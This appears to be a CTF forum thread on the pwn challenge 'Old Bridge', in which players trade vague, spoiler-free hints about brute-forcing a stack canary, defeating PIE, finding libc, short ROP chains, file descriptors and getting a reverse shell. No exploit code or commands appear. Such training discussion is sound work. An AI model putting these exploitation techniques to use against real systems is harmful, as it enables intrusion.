[Pwn] Old Bridge

I can bypass canary. But cannot find a way to leak libc address. Please hint me.

Hi,
I’m stuck after defeating the canary, and got the base address of the application. The buffer limit blocks me from doing anything which i tried to get a shell. Could someone PM me with a hint please?

Have you gotten any further @tare05 ?

I’m stuck at the same place. I have bruteforced the canary and have leaked some info that makes me able to calculate the base address of the application. But since I only have a few bytes to play with, I don’t have space for the rop chains I want.

If anyone have some nudges that doesn’t spoil the whole solution, feel free to send me a PM.

Type your comment> @ghostride said:

Have you gotten any further @tare05 ?

I’m stuck at the same place. I have bruteforced the canary and have leaked some info that makes me able to calculate the base address of the application. But since I only have a few bytes to play with, I don’t have space for the rop chains I want.

If anyone have some nudges that doesn’t spoil the whole solution, feel free to send me a PM.

if you want a nudge hit me a PM or mattermost NSFocus

Hi … , any advice about bypassing the stack limit ? feel free to PM me .

is it possible to get a reverse shell from the docker ?

Type your comment> @TrimechAd said:

is it possible to get a reverse shell from the docker ?

Yes it is

Lovely challenge, good example on how dangerous forks can be with a fairly high level of security options enabled on your ELF binaries.

Could someone possibly PM me a nudge on bypassing the PIE protection? I have a little bird sorted, but I’m struggling to leak something useful for the next step; any decent articles or papers much appreciated! :slight_smile:

I’m almost there, but I can’t find the libc with https://libc.blukat.me. Any hints?

Same as @haeSahje2u. I have a leak and I get addresses for both write and read which are the same distance apart as normal libc’s, but the addresses I get aren’t found in any libc db.

Just managed to pwn it. It was a fun ride for me, if you need a nudge, PM me here, or on twitter @Tare0x5. (probably gonna answer on twitter faster)

Anyone can DM me. I am close but, I need to ask something.

I have this challenge solved, however, there is a certain number at the end (the remote f*** d********* for the s*****) that appears obvious what it should be – but it isn’t. Sorry for the convoluted phrasing, no spoilers.

I’ve already asked others why this is the case, and it seems everyone just stumbled upon the final solution, with no explanation for why this is the case.

If anyone that solved it would like to discuss this, or even better: already know why, don’t hesitate to give me a message.

So I’ve solved every step of this challenge and have the exploit working locally. I just have one issue - finding the version of l**c. Assuming that since I can’t find it using a database, it must be modified? In this case, is it possible to find the offset of functions I need (s*m, elp etc. other than through brute force? Pretty stuck here

@michaelv You don’t need libc if you syscall

Can anyone give a hint about what should it mean to me file-descriptor 7 ? And Local descriptor is 4 ?

I need some help to find which libc the program is using.

Knowledge of libc version is not required. You have something even better in your arsenal.

Type your comment> @limbernie said:

Knowledge of libc version is not required. You have something even better in your arsenal.

Yep. All needed is near %).
Was fun and learnt a lot of new stuff.

while not Success:
    reading
    googling
    trying